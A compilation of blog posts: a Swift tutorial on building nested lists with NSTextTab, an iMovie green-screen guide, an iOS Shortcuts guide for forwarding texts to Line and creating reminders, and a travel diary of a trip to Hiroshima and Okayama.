The example above is simplified to help you understand the layout of NSTextTab; the calculation and summarization process is simplified and the answer is written directly. If you want to use it in a real scenario, you can refer to the following complete code:
let attributedStringFont = UIFont.systemFont(ofSize: UIFont.systemFontSize)
let iterator = ListItemIterator(font: attributedStringFont)

// Nested list data
let listItem = ListItem(type: .decimal, text: "", subItems: [
    ListItem(type: .circle, text: "List Level 1 - 1 StringStringStringStringStringStringStringStringStringStringStringString", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 2", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 3", subItems: [
        ListItem(type: .circle, text: "List Level 2 - 1", subItems: []),
        ListItem(type: .circle, text: "List Level 2 - 2 fafasffsafasfsafasas\tfasfasfasfasfasfasfasfsafsaf", subItems: [])
    ]),
    ListItem(type: .circle, text: "List Level 1 - 4", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 5", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 6", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 7", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 8", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 9", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 10", subItems: []),
    ListItem(type: .circle, text: "List Level 1 - 11", subItems: [])
])
let listItemIndent = ListItemIterator.ListItemIndent(preIndent: 8, sufIndent: 8)
textView.attributedText = iterator.start(item: listItem, type: .decimal, indent: listItemIndent)


// Helper to measure the rendered width of a string in the given font
private extension UIFont {
    func widthOf(string: String) -> CGFloat {
        return (string as NSString).size(withAttributes: [.font: self]).width
    }
}

private struct ListItemIterator {
    let font: UIFont

    struct ListItemIndent {
        let preIndent: CGFloat
        let sufIndent: CGFloat
    }

    func start(item: ListItem, type: NSTextList.MarkerFormat, indent: ListItemIndent) -> NSAttributedString {
        let textList = NSTextList(markerFormat: type, startingItemNumber: 1)
        return item.subItems.enumerated().reduce(NSMutableAttributedString()) { partialResult, listItem in
            partialResult.append(self.iterator(parentTextList: textList, parentIndent: indent.preIndent, sufIndent: indent.sufIndent, item: listItem.element, itemNumber: listItem.offset + 1))
            return partialResult
        }
    }

    private func iterator(parentTextList: NSTextList, parentIndent: CGFloat, sufIndent: CGFloat, item: ListItem, itemNumber: Int) -> NSAttributedString {
        let paragraphStyle = NSMutableParagraphStyle()

        // e.g. 1.
        var itemSymbol = parentTextList.marker(forItemNumber: itemNumber)
        switch parentTextList.markerFormat {
        case .decimal, .uppercaseAlpha, .uppercaseLatin, .uppercaseRoman, .uppercaseHexadecimal, .lowercaseAlpha, .lowercaseLatin, .lowercaseRoman, .lowercaseHexadecimal:
            itemSymbol += "."
        default:
            break
        }

        // width of "1."
        let itemSymbolIndent: CGFloat = ceil(font.widthOf(string: itemSymbol))

        let tabStops: [NSTextTab] = [
            .init(textAlignment: .left, location: parentIndent),
            .init(textAlignment: .left, location: parentIndent + itemSymbolIndent + sufIndent)
        ]

        let thisIndent = parentIndent + itemSymbolIndent + sufIndent
        paragraphStyle.headIndent = thisIndent
        paragraphStyle.tabStops = tabStops
        paragraphStyle.defaultTabInterval = 28

        let thisTextList = NSTextList(markerFormat: item.type, startingItemNumber: 1)
        // Compose this item, then recurse into its sub-items with the accumulated indent
        return item.subItems.enumerated().reduce(NSMutableAttributedString(string: "\t\(itemSymbol)\t\(item.text)\n", attributes: [.paragraphStyle: paragraphStyle, .font: font])) { partialResult, listItem in
            partialResult.append(self.iterator(parentTextList: thisTextList, parentIndent: thisIndent, sufIndent: sufIndent, item: listItem.element, itemNumber: listItem.offset + 1))
            return partialResult
        }
    }
}

private struct ListItem {
    var type: NSTextList.MarkerFormat
    var text: String
    var subItems: [ListItem]
}

- A ListItem object encapsulates sub-list items, combining them recursively and calculating the spacing and content of the item list.
- NSTextList is only used for its marker method to generate list symbols; it could also be implemented independently without it (a minimal sketch follows after this summary).
- The spacing before and after the item symbol is controlled by preIndent and sufIndent.
- Since the Font is used to calculate widths, make sure to set .font on the text to ensure an accurate calculation.

Initially, we hoped that we could achieve the desired effect directly using NSTextList, but the result and the level of customization were both poor. In the end, we had to rely on a makeshift solution with NSTextTab, controlling the position of \t to manually combine item symbols. It's a bit cumbersome, but the effect perfectly meets the requirements!
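As a side note on the marker point above, here is a minimal, hypothetical sketch of generating list symbols without NSTextList; the ListMarker type and its cases are assumptions for illustration only (not part of the original implementation), covering just the two formats used in this article:

// A hypothetical replacement for NSTextList.marker(forItemNumber:)
enum ListMarker {
    case decimal // 1. 2. 3. ...
    case circle  // the same "◦" symbol for every item

    func marker(forItemNumber number: Int) -> String {
        switch self {
        case .decimal:
            return "\(number)." // includes the trailing "." that NSTextList cannot add for us
        case .circle:
            return "◦"
        }
    }
}

// Usage: build the same "\t<symbol>\t<text>\n" string as in the code above.
let line = "\t\(ListMarker.decimal.marker(forItemNumber: 1))\tList Level 1 - 1\n"
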
The goal has been achieved, but I still haven't fully mastered NSTextTab (for example, other alignment directions? the relative positioning of Location?). The official documentation and online resources are too scarce; I'll study it further if I get the chance.
A tool to help you convert HTML strings to NSAttributedStrings, with support for custom style assignment and custom tag functionality.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Using iMovie’s green screen keying feature to composite videos
Recently, while mindlessly relaxing, I came across a very common wallpaper app advertisement that showcased an eye-catching transparent perspective wallpaper; but it’s obviously impossible, even if the rear camera was capturing the scene in real-time, the angles wouldn’t match so perfectly!
Although I knew it was a special effect, I thought it would be very complicated; unexpectedly, the built-in iMovie app on the iPhone can easily create it with a few taps.
You can download this image directly or get it from the internet
These 5 items can create a perspective effect!
I used two eel cans and a bottle of mineral water as a phone stand (a vertical phone stand would be even better!)
The purpose of using a phone stand is to ensure that the angles of the two videos are consistent. Otherwise, there will be a shift in the frame, and the effect won’t look as good. It’s impossible to hold the phone and have the angles of both videos be 100% the same.
Shoot the clean video as long as you want the final video to be.
“Settings” -> “Wallpaper” -> “Choose the downloaded green screen” -> “Set Both”
Finished image
The length of the video should be the same as the clean video; it’s okay if it’s longer, you can trim it later.
“+” -> “Movie” -> Select “Clean Video” -> “Create Movie”
Insert the clean video into the project.
If you don’t move the playhead to the beginning of the clean video, you will see the message “Move the playhead away from the end to add overlay” when inserting the green screen video.
Click the top right “+” -> “Video” -> “All”
Select “Phone Operation Video” -> “…” -> “Green/Blue Screen” (commonly known as: Chroma Key)
Click the top “Phone Operation Video” -> Scroll to the frame with the green screen -> Click the “Green Area” -> Complete the perspective transparency
Confirm that the end times of the two videos are consistent, click “Done” in the upper left corner -> “Share” at the bottom -> Select the output target -> Output complete
Just for fun… I didn’t expect iMovie to be so powerful!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
iOS uses Shortcuts to easily automate forwarding specific text messages to Line and automatically create reminders for parcel collection and credit card payment
Photo by Jakub Żerdzicki
Shortcuts (formerly Workflow) is a new feature introduced in iOS 12; it allows users to create a series of tasks to be executed with a single tap and set to run automatically in the background.
In addition to the built-in Shortcuts feature in iOS, Apple has also opened up Siri Shortcuts / App Intents to developers in recent years, allowing third-party apps to integrate some functions into Shortcuts for users to combine.
The automatic execution conditions are currently limited to iOS itself or Apple’s own apps, such as specific times, arrival, departure from a location, NFC detection, receiving messages, emails, or connecting to Wi-Fi, battery level, Do Not Disturb mode, sound detection, and more.
For Apple’s own services, there is no need to jailbreak as in the early days of forwarding text messages; Shortcuts function without jailbreaking and without installing strange third-party apps.
There is already a lot of content online introducing how to use Shortcuts and providing ready-made scripts, so this article will not go into detail.
The message forwarding feature across iOS devices (Settings -> Messages -> Message Forwarding) requires devices with the same Apple ID, so we need to use Shortcuts to help us forward specific messages.
This article only introduces three practical, convenient, and simple application scenarios.
In this era of rampant scam text messages, we are afraid that elderly family members or children at home may receive scam messages and inadvertently provide information to scammers, or that elderly family members may not understand the process of receiving text message verifications for account security and need remote assistance to complete the verification; we also fear that children may use their phones to do things that are not allowed.
https://branch.taipower.com.tw/d112/xmdoc/cont?xsmsid=0M242581319225466606&sid=0N209616847897374705
Conditions are set as follows:
Even in standby mode without unlocking the phone, the forwarding can be executed correctly.
Message contains "http" (= all text messages containing URLs will be forwarded); create separate shortcuts for multiple keywords. When - Other Settings:
If only the last four conversation partners or groups appear here, and if the desired target does not appear, you can go back to Line and send a few messages to the target, then come back and it will appear.
Selecting contacts’ phone numbers in Line to send messages is not effective.
After adding the recipient
To change the recipient to XXX, you need to click on the right X to remove the entire Line action, then add the Line Send Message action again with the new recipient.
When I receive a message containing "XXX", treat the message as input, Line will send "content" to "XXX"
Just wait for new text messages to come in, and if they contain the specified keywords, they will be automatically forwarded (even if the phone is not unlocked). Due to current functionality limitations, a separate shortcut needs to be created for each keyword, and if the same text message contains different keywords, it will be sent twice.
I currently use Apple’s built-in Reminders as a tool for managing daily tasks, so I also want to integrate things that need to remind me, such as package arrival at convenience stores, credit card payment notifications, etc.
Setting conditions as follows:
Similar to the conditions set for automatically forwarding text messages in the previous section; here, set the message content to contain "送達" (delivered) and change it to "Run Immediately".
First, we need to set the due date for the reminder task: add a date variable and calculate the desired reminder time starting from when the message is received.

- Add a new blank automation action.
- Search for "Adjust Date" and add the "Adjust Date" action.
- In the "Date" input box of "Add 0 seconds to Date", select "Current Date".
- In the "seconds" input box of "Add 0 'seconds'", change it to "days".
- Search for "Reminder", scroll down and tap "Add Reminder".
- After adding "Add Reminder", in the "Reminder" input box under "Add 'Reminder' to 'Reminders' without prompting", select "Shortcut Input" so it becomes "Add 'Shortcut Input' to 'Reminders' without prompting".
- In the "Shortcut Input" input box, change "Message" to "Content".
- Change "Do not remind" to "Remind".
- In the input box next to "2:00 PM", choose the variable "Adjusted Date".

After everything is okay, click "Done" in the top right corner. If clicking "Done" does not respond, it may be an iOS bug; you can ignore it and directly click "Back" to return to the home page.
As mentioned earlier, just wait for a new text message to come in. If it contains the specified keywords, a reminder will be automatically created (even if the phone is not unlocked). Due to current limitations, a separate shortcut needs to be created for each keyword. If the same text message contains different keywords, two reminders will be created.
Another useful notification is for credit card bill notifications. Similar to text messages, you can trigger a shortcut automation to add a reminder task when receiving an email. However, since automation functions are not yet available to third-party apps, you can only use the Apple Mail App to trigger it.
Setting conditions as follows:
Please note that each company uses a different format. Some may call it "Credit Card E-Bill" or "Credit Card E-Statement," and some are even more specific, like "Credit Card XXXX Year X Month E-Bill" from Cathay United Bank.
Since Regex is not supported at the moment, text matching is the only option. As mentioned earlier, a separate shortcut needs to be created for each keyword.
Confirm “Settings” -> “Mail” -> “Accounts” -> “Fetch New Data” is set to fetch or push.
Subject contains "Credit Card Bill"; create multiple shortcuts for multiple keywords. "Run Immediately" - Additional Settings:
First, set the due date of the reminder: add a date variable and calculate the desired reminder time from when the email is received plus the time interval.

- Add a blank automation action.
- Search for "Adjust Date" and add the "Adjust Date" action.
- In the "date" input box of "Add 0 seconds to 'date'", select "Current Date".
- In the "seconds" input box of "Add 0 'seconds'", change it to "days".
Unlike triggering message by message, email triggering is batch fetching, so as long as the batch contains emails with the keyword title, those new emails will also be brought in together.
Not sure if it’s a shortcut bug, but the result is as described.
For example: Batch fetch three emails, including a Carrefour notification email, a credit card bill email, and an Uber notification email, all three will be input as shortcuts; therefore, we need to add another step to filter out the keyword emails we want.
Pseudo Logic:
for email title in emails
    if email title.contains("credit card bill") then
        Add reminder
    end
end

- Search for "Repeat", scroll down and tap "Repeat every item".
- It shows "Every item in 'adjusted date'"; in the "adjusted date" input box, choose "Clear variable", then in the resulting "item" input box choose "Shortcut Input" so it reads "Every item in Shortcut Input".
- Search for "If", scroll down and tap "If".
- Place the 'If "Repeat Result" "Condition"' action under "Every item in Shortcut Input" (inside the repeat).
- In the "Repeat Result" input box of 'If "Repeat Result" "Condition"', change the selection below to "Title", then click the "X" next to the menu to close it.
- The action now reads 'If "Title" "Condition"'; change the condition to "Contains", enter "credit card bill", and click "Done" on the keyboard.
- Add the "Add Reminder" action inside the If branch, set up as in the previous section.

After adding "Add Reminder": change "Do Not Notify" to "Notify"; in the "2:00 PM" input box, choose the variable "Adjusted Date", then click the "X" next to the menu to close it. If there is no response after clicking "Done", it may be an iOS bug; you can ignore it and click "Back" to return to the home screen.
You can view, pause, or modify this shortcut on the Shortcuts Automation homepage.
Setting up email is a bit more complicated because it involves batch extraction, so you need to filter again and create reminders based on the filtered results.
After the Shortcuts Automation is executed, a notification will pop up that cannot be closed.
You have now completed several basic automation integration functions, saving you daily effort with just a few simple steps. For more advanced integrations, such as API integration with Notion or more complex integrations, they can also be achieved technically. What you lack is not the technology but your imaginative automation ideas!
If you have any questions or feedback, feel free to contact me.
6-day trip to Hiroshima, Okayama, Fukuyama, Kurashiki, and Onomichi in 2023
After resigning at the end of August, I immediately set off on a "10-day Solo Stroll in Kyushu" in September and rested for almost three months. I had originally planned to start work in mid-November; the new job involves new projects, and the new company does not offer much special leave (annual leave accrues according to the basic Labor Standards Act), so I considered going out to play again (planning started at the end of October).
Last time, due to an unexpected incident on the way to Nagasaki, I received a souvenir from Onomichi in Hiroshima Prefecture; and having already visited the Nagasaki Atomic Bomb Museum and Peace Park on that trip, I thought I could also visit Hiroshima this time.
Also, friends around me highly recommended Hiroshima, with World Heritage sites such as Itsukushima Shrine, oysters, Seto Inland Sea, Onomichi, Rabbit Island…
And since it’s a solo trip, not considering big cities or cities I’ve already been to, hoping for convenient transportation, Hiroshima is a great choice!
Originally planned to start work on 11/20 (later postponed to 12/1), deducting the last day as a buffer for rest, the return date was set for 11/18 (Saturday).
For the departure date, originally had plans with friends on 11/12, so I decided to depart on 11/13 (Monday); but since the work arrangements were flexible, mainly based on when the flight prices for the round trip were lower.
❌ The most intuitive way to go to Hiroshima is through Hiroshima Airport, but the conditions are very unfavorable:
❌ In and out of Fukuoka + Shinkansen, still inconvenient:
❌ Later found out that I could go to Hiroshima through Okayama with Tigerair, the motivation to go was average:
Since I had spent a lot during the “ 10-day Kyushu trip in September “, if I couldn’t keep the flight ticket price around 10,000, the motivation to go was not strong, so I almost gave up on this trip.
✅ Tigerair Okayama Winter Travelogue Event , Departure:
On October 31, while browsing Facebook out of boredom, I happened to see a post in the “ Japan Free Travel Discussion Group “ community where someone shared about discounted airfare promotions from an airline from 11/3 10:00 to 11/6 23:59. Luckily, with a go-with-the-flow attitude, I decided to go if I could get a discount and let it go if not.
11/3 I was very lucky to buy the tickets early in the morning, with the best departure and return dates (11/13–18), the best flight times, and the best prices, so there’s no reason not to go!
After buying the tickets, there is only one week left before departure, so I will start preparing eagerly.
The places I most want to visit are Miyajima, Onomichi, Kurashiki, and Okayama Castle; so I will use Hiroshima as a base, stay there for several days, and then stay around Okayama closer to the return date.
JR Pass Okayama & Hiroshima & Yamaguchi Area Rail Pass (¥ 17,000, just in time for the price increase after the end of October 2023.)
Checking the fare from Okayama to Hiroshima station, one way is ¥6,460, round trip is ¥12,920; adding trips to Miyajima, Onomichi, and Kure… round trip, it should be worth it; buying the JR Pass directly is the most convenient option.
Toyoko Inn Hiroshima Station Baseball Stadium Front (3 nights)
Toyoko Inn consistently offers great value for money, with both price and environment being the best of this accommodation.
APA Hotel Hiroshima Ekimae Ohashi (1 night)
Since Toyoko Inn was fully booked for four nights, I could only stay at APA Hotel for one night.
Livemax Okayama Kurashiki Ekimae Hotel Livemax (1 Night)
We ended up in Kurashiki because we couldn’t find any affordable hotels in Okayama when looking for accommodation. We had to look along the JR line, as there are shuttle buses from Kurashiki back to Okayama Airport; so we decided to find a hotel near Kurashiki.
This was the only hotel in Kurashiki with available rooms, convenient location, and acceptable prices.
Original plan:
Okunoshima Island is too far and inconvenient, so it’s just on the reference list.
Departure at 11:10 in the morning, slowly getting ready to leave.
From Taipei Main Station, take the airport MRT to Terminal 1 of Taoyuan Airport, arriving at the check-in counter around 08:50.
Not many people, quickly completed check-in + departure; not much to eat at Terminal 1, bought a snack and coffee and headed to the boarding gate.
Not very hungry while waiting, so didn’t buy any snacks.
Departed at 11:07, arrived at OKJ (Okayama Momotaro Airport) at 14:11; felt hungry in between but found out that Tigerair doesn’t allow bringing your own food on board (Peach Aviation doesn’t have specific regulations), so patiently waited, planning to eat before entering the country.
Okayama Airport is super small, followed the crowd and went straight through immigration, no corner to sneakily eat; because the snack had chicken, worried about quarantine issues, so handed the whole package over to customs for disposal.
Completed immigration + baggage claim around 14:40 (super fast). Later checked the flight schedule, Okayama Airport has very few flights, maybe only one international flight a day, so there were very few people, only those on the same flight; customs and quarantine dogs checked each person, but it was still very quick!
Immediately took the airport shuttle bus upon exiting, probably due to the limited flight schedule, the shuttle to Okayama Station was scheduled for 16:10; but there was an extra shuttle waiting outside the airport (departing when full, with another one following soon), very thoughtful to save everyone time!
After getting off, found the escalator to go up to Okayama Station, first went to exchange for the JR Pass, found the machine in green with “ EXPRESS Reservation, 5489 Pick-up “ written next to it to exchange for the JR Pass ticket.
I found an exchange tutorial on the internet, which says to click the blue "予約したきっぷのお受取り" button. However, when following the steps and scanning the QR Code, an "Invalid QR Code" error kept appearing; even trying to enter the order number failed.
Finally, after several attempts by a group of Taiwanese people, it was discovered that you need to use the yellow button “ QRコードの読取り “ at the bottom left to exchange, and after clicking it, you can directly scan the QR Code. (Guess JR machines have been updated)
The machine will dispense two instruction sheets, one JR Pass ticket (the one with the checkmark in the image). You can also complete the seat reservation after receiving the JR Pass. Remember to use the JR Pass ticket for entering and exiting the stations, as the reserved ticket is only for reference for seat and time and cannot be used for station access.
Feeling very hungry and not having eaten anything, I first went to a convenience store to buy something to eat. I then bought a few JR tickets for the upcoming trains.
Arrived at Hiroshima Station around 16:45.
First, I checked in at the hotel to drop off my luggage before going out to find food. This road is quite deserted when there are no baseball games. On the opposite side is the railway, and there aren’t many shops along the road, but fortunately, there is a large street shop, Lawson.
Returned to the station in Hiroshima to eat Hiroshima-style okonomiyaki at “Hiroshima Okonomiyaki Story Station Square,” located on the 6th floor to the right after exiting Hiroshima Station (next to Ekie department store). As soon as you step out of the elevator, you’ll find it quite unique as the entire floor is filled with Hiroshima-style okonomiyaki restaurants, allowing you to choose your preferred restaurant to dine in.
Ordered a Hiroshima-style okonomiyaki with added rice cakes (fried noodles inside). The taste was average, with noodles and rice cakes inside, and I felt quite full after eating.
Bought a late-night snack on the way back to the hotel. The night in Hiroshima was quite cold at around 4 degrees.
Unpacked in the room.
When you pull back the curtains, you can see the railway outside (about 10 lines, so you need to be quick when crossing the level crossing); the downside of the room is that there is a knocking sound when the train passes by.
This time I brought the Allite A1 65W Gallium Nitride Fast Charger + Allite Liquid Silicone Fast Charging Cable combination for the trip. Since switching to iPhone 15, almost all devices have switched to Type-C ports; when traveling, just bring a Type-C charging cable to solve everything.
The Allite A1 65W Gallium Nitride Fast Charger supports single-port 65W, dual-port 45W+18W fast charging; it is small in size and can be carried around. When you see a rechargeable plug outdoors, just plug it in to continue charging; back at the hotel, one port charges the power bank, and the other charges the phone, watch, iPad, or Switch, making it convenient and fast.
The Allite Liquid Silicone Fast Charging Cable (1.5m) is long enough to be directly connected from the power bank in the bag for use. The liquid silicone material is different from regular plastic, not only skin-friendly but also easier to bend for storage without deformation.
The best charging companion for this trip.
KKday itinerary reference:
[Japan. Miyajima Momijidani Park, Itsukushima Shrine Rickshaw Experience](https://www.kkday.com/zh-tw/product/22395-miyajima-private-tour-ebisuya-rickshaw-experience?cid=19365&ud1=31b9b3a63abc){:target=”_blank”}
In the early morning, take the JR to Miyajima-guchi Station, and walk towards the pier after exiting the station to find the ferry terminal. JR Pass includes the Miyajima ferry ticket, so there’s no need to buy a separate ticket, but you need to pay the Miyajima visit tax (¥100), and station staff will guide you to purchase the tax ticket.
Alternatively, you can also take the Hiroden to Miyajima-guchi, but I remember it takes longer.
The ferry takes about 10 minutes to reach Miyajima, and the ferry ride is smooth without a diesel smell. You can see the floating torii gate from afar as you approach!
Upon arriving on the island, head towards the floating torii gate. It’s beautiful and less crowded to take photos along the shore.
There are also many wild deer on the island, be careful as they might nibble on things XD.
After passing through Itsukushima Shrine, head to the Miyajima Ropeway to the Shishiiwa Observatory.
You need to take two cable cars to reach the Shishiiwa Observatory. The advantage of taking the cable car directly is that there are almost no people (lots of people at Itsukushima Shrine below). The first section is a small cable car for up to 6 people (frequent departures, longer distance), and the second section is a larger cable car (if I remember correctly, it departs every 15 minutes and can accommodate more people, about 20 people, with a short distance).
From the mountaintop, you can overlook the entire Seto Inland Sea, enjoy the breeze, and admire the small islands.
Itsukushima Shrine is built directly by the sea, with clean water and a serene atmosphere. You can also queue to take photos of the torii gate in the sea from the front.
During this season, the tide recedes at 3 am or 5 pm. Unfortunately, this time I didn’t have the chance to see the Itsukushima Shrine and torii gate at low tide.
For lunch, of course, you must eat oysters. The oyster rice and fried oysters at Oyster House cost around 300 TWD each, delicious and affordable, a feast of oysters!
Miyajima Ropeway and Itsukushima Shrine tickets.
Bought a small Itsukushima Shrine torii gate to take home, very cute!
Returned to Hiroshima city in the afternoon and visited the Atomic Bomb Dome and Peace Memorial Park.
In autumn, Hiroshima is adorned with the yellow of ginkgo trees, the red of maple leaves, and some green leaves, accompanied by the cool autumn breeze, reminiscing about everything that happened in Hiroshima.
Encountered many Japanese middle and elementary school outdoor classes at the Peace Memorial Park, with teachers explaining the history. I deeply feel the importance the Japanese people place on passing down historical education.
Returned to the hotel in the late afternoon to rest because it was too cold outside as I was dressed lightly.
Dinner was bought directly on the way back to the hotel from the “Charcoal Grilled Meat Min Sarumonkey Bridge Store” takeout barbecue box; what initially caught my eye about this store was that there were several charcoal stoves placed at the entrance, which felt very warm as I walked by. When I stopped to look at the sign, I found out they offered takeout boxes, so I went in!
Another interesting thing was that their meal box had a self-heating function. When you want to eat it back at the hotel, you just pull a string, and it will start heating itself, emitting hot steam; it feels freshly baked and warm whenever you eat it, very thoughtful.
Today’s convenience store late-night snack included hot dogs, fried chicken, Strong Zero, and also bought a bottle of Yakult Y1000, which is said to help you sleep well after drinking. (But I was already very sleepy today after walking all day)
In the morning, took the Shinkansen to Mihara, then transferred from Mihara to Onomichi Station.
Didn’t time it well, had to wait for over 30 minutes when transferring from Mihara to Onomichi.
Walked out of the south exit to the main entrance of Onomichi Station.
The weather was good and the temperature was comfortable, so after leaving Onomichi Station, I walked straight to Senkoji Temple; walking on the mountain side felt like walking in Jiufen Old Street, the path was not easy to walk, with many stairs and steep slopes, but on the other side, you could see the Seto Inland Sea, the scenery was nice.
Another option is to walk directly on the main road until you see the sign for the Senkoji Ropeway, then turn in and take the ropeway up to Senkoji.
The view from Senkoji Temple is great, overlooking the entire Onomichi city area and the distant Onomichi Ohashi Bridge.
Brought home a cute little Jizo statue (you can choose to write down a wish and leave it at Senkoji for offering or take it home as a souvenir):
After visiting Senkoji Temple, walking down leads to the Cat Alley.
Early internet articles often introduced the Cat Alley in Japan’s Hou Tong, but this year’s actual visit felt different; the Cat Alley is a small path downhill from Senkoji, didn’t see any stray cats, the cat cafes along the way were almost all closed, walking down felt a bit lonely, finally found a coffee shop that was still open, “Bouquet D’arbre,” to have a cup of coffee and take a break.
Tomo-no-Ura Beach is now just a quiet stretch of sand, with only the occasional sound of a group of sea ducks playing. (It’s my first time seeing saltwater ducks, not saltwater chickens.)
After about 15 minutes, with nowhere else to go, we waited for the ferry back; although the place was desolate, there were vending machines! On the way back, we took a closer look at Benten Island in the distance, a small island with a torii gate standing alone in the middle of the sea.
Returning to Tomo-no-Ura as evening approached, we strolled to the harbor to see the evening lights and the Japanese-style castle town scenery. On the way, many people and photography enthusiasts were already sitting on the steps near the harbor, setting up their cameras, waiting for the sunset.
Tomo-no-Ura is famous for its invigorating and life-saving liquor, with a strong medicinal wine aroma on the road; because we had to rush back to Hiroshima, we took a bus back to Fukuyama before it got dark.
After returning to Fukuyama, we hopped on the train to Hiroshima, bidding farewell to this peaceful and serene city. For dinner, we bought a takeout barbecue box from “ Yakiniku Toshi Saruhashi Store “ on the way back to the hotel.
Also added two fried oysters from the convenience store (only 100 yen each).
The late-night snack was again a Yakult Y1000 from the convenience store.
Early in the morning, we checked out of Toyoko INN and headed to Hiroshima APA Hotel where we would stay that night.
After storing our luggage, we walked back to Hiroshima Station to catch a train to Kure (about 50 minutes). As we approached Kure, looking out the right window felt like taking the train back to Fulung, Yilan, with mountains on the left and the sea on the right, a pleasant view.
Upon exiting the station, you can visit the tourist information center to get a travel guide for Kure. (The design is really good!)
Following the signs, you can walk from the station to the Yamato Museum and the Maritime Self-Defense Force Kure Museum.
When you’re at the end of the bridge, don’t rush to descend. From the bridge, you can get a good view of the Maritime Self-Defense Force Wushi Archives - Submarine.
For friends planning to visit Kure and Hiroshima in the future: you can also take a boat from Kure to Miyajima and then back to Hiroshima. I originally wanted to take the boat back to Hiroshima, but I missed the departure time, so I gave up this time.
Inside, there is a close-up view of the Yamato battleship from almost every angle, with detailed displays of battleships, war history, fighter planes, cannons, and more. It’s a must-visit for battleship enthusiasts and military fans. Additionally, there was a special exhibition on the history and design of Japanese aircraft carriers, including design sketches.
After leaving the Yamato Museum, walk towards the back to reach the Maritime Self-Defense Force Kure Museum, which is free to enter.
The museum mainly showcases the living environment, working environment, engines, mines, and history inside submarines.
The most special part is that you can actually enter the submarine and see the real cockpit, dormitory, captain’s room, control room, and use the periscope to view the external environment.
After visiting the museum, with noon approaching, I got ready to eat. I initially wanted to have Navy Curry, but after checking the reviews it didn't seem particularly special, so I walked back to the Kure shopping street to decide. (It's actually quite far, in the opposite direction; it took about 30 minutes to walk.)
I finally chose to eat Kure cold noodles, similar to cold noodles with pork-bone char siu; the noodles are chilled and refreshing, and the portion is quite large, so ordering a small portion is sufficient.
After eating, getting ready to head back to the station, I also bought “Fukuzumi Fried Red Bean Cake” on the way, which was sweet and oily, tasting quite ordinary; and also bought Navy Coffee and Curry as souvenirs on the way (subarucoffee_store/, the staff was very friendly and enthusiastic).
I walked back to Kure Station and took a train back to Hiroshima.
After returning to Hiroshima, the final tour of Hiroshima city area. There are three sightseeing bus routes available right outside Hiroshima Station (included in JR Pass), so you can choose the direction you want to go.
I want to visit Shukkeien (Hiroshima Museum) first, so I choose to take the red Maple Leaf bus.
Shukkeien is located behind the Hiroshima Museum, and you can also buy a combined ticket for Shukkeien + Hiroshima Museum when purchasing tickets.
Shukkeien is a very exquisite small garden with many miniature landscapes, such as maple leaves, flowing water under small bridges, bamboo groves, pine trees, hills, etc. It’s nice to take a walk and enjoy the scenery.
Next stop is a leisurely walk to Hiroshima Castle. The original Hiroshima Castle was destroyed in the atomic bombing, and the current Hiroshima Castle is a reconstruction. It looks very new, not very tall, and you can’t see much scenery from the main keep.
The last stop is back to the Peace Memorial Park, next to which is the Paper Crane Tower (not very tall, didn’t go in).
Just happened to encounter Shingo Takatori coming to pay his respects in the afternoon.
Queue up to buy tickets to visit the Peace Memorial Museum, which has a very rich history of the nuclear bombing process, history, as well as data photos and objects; the overall visit is very heavy and shocking.
On the other side of the park, there is also a memorial hall, but it was too heavy to go in.
In the evening, a drizzle started, matching the mood of just having seen a painful historical lesson, and returned to Hiroshima Station.
Bought some souvenirs at the station and a bento box to take away, then returned to the hotel to rest, still need to do laundry today.
APA’s president is really everywhere, President’s curry, President’s water, President’s book…
The room density is as dense as usual, with over 60 rooms on one floor.
The room is small, but well-equipped, and the electronic facilities are very convenient (you can see the laundry room dynamics in the room, and the TV can directly Airplay).
Encountered a big trouble when doing laundry, long queues, with only 7 washing machines for over 1000 rooms in the building. Finally, seized the right timing, queued downstairs when the washing machine was about to finish, and finally finished washing and drying clothes around 11 o’clock (not dry yet, continue to hang in the room).
It was so late, it was very reasonable to have a late-night snack today! Still Y1000 + milk + convenience store ready-to-eat food.
Early in the morning, the weather was beautiful and sunny; checked out of the hotel, said goodbye to Hiroshima, and headed to Kurashiki to leave luggage at the hotel (can also leave it in Okayama first, as you need to go to Okayama before going to Kurashiki).
First stop at Achi Shrine, located at a higher altitude overlooking the entire Kurashiki area, very quiet with few people.
Achi Shrine is not big but is famous for its Ema Pavilion. If you draw a bad fortune, you can tie it under the corresponding animal head according to your zodiac sign. There is also the "Hanawa Musubi" for seeking good relationships (source):
The area is not large but very quiet and pleasant to stroll around. As the boat tickets were sold out that day, we didn’t get a chance to experience it, but walking around the nearby alleys was also very comfortable.
For lunch, we had the famous curry set meal at Miyake Shoten. The curry was rich and delicious, especially paired with burdock strips.
After eating, we continued our stroll and when we got tired, we went to have the “Fruit Parfait” at Parlor Kudamachi (where the staff wears maid costumes from the Taisho era). The Okayama Seio grapes with fruit ice cream were sweet to the point of numbness.
For souvenirs, you can buy the collagen-rich Okayama fruit jelly from GOHOBI, a specialty of Kurashiki.
As the sun set, we took the train back to Okayama Station, where we could directly take a tram to the area around Okayama Castle.
First stop at Okayama Korakuen Garden, the evening illumination feels romantic and beautiful.
On the way, visit the neighboring Okayama Castle to see the night view, which has a unique charm with the maple leaves illuminated.
Dinner was easily settled by having Ichiran ramen on the spot, then strolling back to Okayama Station (the street lights were beautiful along the way). Before returning to Kurashiki, there was some time to browse through the discount store (Don Quijote), but there were not many souvenirs, so you have to go to Okayama Station or department stores to find them…
Upon returning to Kurashiki, it was already evening, the weather was cold, and people on the street were rushing home. The outlet behind Kurashiki Station had also closed.
Only then did I realize that the hotel did not have a 24-hour front desk, luckily I didn’t come back too late! However, the hotel room facilities were very complete, with a microwave, kettle, and glasses cleaning machine.
On the last night in Japan, I simply had convenience store chicken nuggets + a Yakult Y1000, and bought an extra bottle of white peach strawberry milk as a midnight snack before falling asleep.
In the early morning just as the day was breaking, I checked out and headed to Okayama.
Planning to take the airport shuttle from Okayama back to the airport, there is also a direct shuttle from Kurashiki to Okayama Airport but with fewer trips ( For details, please refer to the official website ). Since I hadn’t finished exploring Okayama yesterday, I decided to head straight to Okayama and then return from there.
